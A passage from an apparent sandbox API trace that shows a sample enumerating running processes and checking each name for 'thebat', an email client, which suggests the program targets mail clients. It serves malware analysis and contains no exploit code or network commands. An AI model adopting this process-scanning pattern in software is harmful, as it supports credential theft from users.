(uFlags=0x40, uBytes=0xc) returned 0x357c3a8 [0099.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x357c3a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0099.704] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0099.704] StrStrIA (lpFirst="omnipos.exe", lpSrch="thebat") returned 0x0 [0099.704] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0099.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.706] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c2b8 [0099.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x357c2b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0099.706] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0099.706] StrStrIA (lpFirst="spcwin.exe", lpSrch="thebat") returned 0x0 [0099.706] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0099.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0099.708] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357d928 [0099.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357d928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0099.708] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0099.708] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="thebat") returned 0x0 [0099.708] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0099.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.709] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357c4c8 [0099.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x357c4c8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0099.709] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0099.709] StrStrIA (lpFirst="utg2.exe", lpSrch="thebat") returned 0x0 [0099.709] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0099.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.710] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c480 [0099.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x357c480, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0099.711] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0099.711] StrStrIA (lpFirst="saying.exe", lpSrch="thebat") returned 0x0 [0099.711] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0099.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.712] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357c5a0 [0099.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x357c5a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0099.712] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0099.712] StrStrIA (lpFirst="ripe.exe", lpSrch="thebat") returned 0x0 [0099.712] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0099.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.713] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c450 [0099.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x357c450, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0099.713] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0099.713] StrStrIA (lpFirst="acoustic.exe", lpSrch="thebat") returned 0x0 [0099.713] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0099.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.714] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357c318 [0099.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x357c318, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0099.715] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0099.715] StrStrIA (lpFirst="mail.exe", lpSrch="thebat") returned 0x0 [0099.715] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0099.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.716] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c2d0 [0099.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x357c2d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0099.716] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0099.716] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="thebat") returned 0x0 [0099.716] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.717] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c3c0 [0099.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357c3c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.717] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.717] StrStrIA (lpFirst="svchost.exe", lpSrch="thebat") returned 0x0 [0099.717] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0099.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.719] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c468 [0099.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x357c468, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.719] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0099.719] StrStrIA (lpFirst="dllhost.exe", lpSrch="thebat") returned 0x0 [0099.719] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0099.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.720] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357c2e8 [0099.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x357c2e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0099.720] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0099.720] StrStrIA (lpFirst="taskhostw.exe", lpSrch="thebat") returned 0x0 [0099.720] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0099.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.722] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357c570 [0099.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x357c570, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0099.722] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0099.722] StrStrIA (lpFirst="UsoClient.exe", lpSrch="thebat") returned 0x0 [0099.722] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0099.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.724] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357c300 [0099.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x357c300, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0099.724] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0099.724] StrStrIA (lpFirst="taskhostw.exe", lpSrch="thebat") returned 0x0 [0099.724] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0099.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0099.725] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357d988 [0099.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x357d988, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0099.725] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0099.725] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="thebat") returned 0x0 [0099.725] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0099.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.726] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357d8c8 [0099.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357d8c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0099.726] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0099.726] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="thebat") returned 0x0 [0099.726] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0099.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0099.727] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356c1f8 [0099.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356c1f8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0099.727] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0099.728] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="thebat") returned 0x0 [0099.728] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0099.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.729] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c498 [0099.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x357c498, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.729] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0099.729] StrStrIA (lpFirst="conhost.exe", lpSrch="thebat") returned 0x0 [0099.729] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0099.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.730] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c330 [0099.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x357c330, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.730] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0099.730] StrStrIA (lpFirst="conhost.exe", lpSrch="thebat") returned 0x0 [0099.730] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0099.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.731] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c378 [0099.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x357c378, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0099.731] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0099.731] StrStrIA (lpFirst="rxodge.exe", lpSrch="thebat") returned 0x0 [0099.732] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0099.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.733] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357c390 [0099.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x357c390, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0099.733] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0099.733] StrStrIA (lpFirst="sppsvc.exe", lpSrch="thebat") returned 0x0 [0099.733] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0099.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.734] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357db08 [0099.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357db08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0099.734] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0099.734] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="thebat") returned 0x0 [0099.734] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0099.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.735] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c3d8 [0099.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x357c3d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0099.735] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0099.735] StrStrIA (lpFirst="TiWorker.exe", lpSrch="thebat") returned 0x0 [0099.735] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 0 [0099.736] CloseHandle (hObject=0x350) returned 1 [0099.736] CreateToolhelp32Snapshot 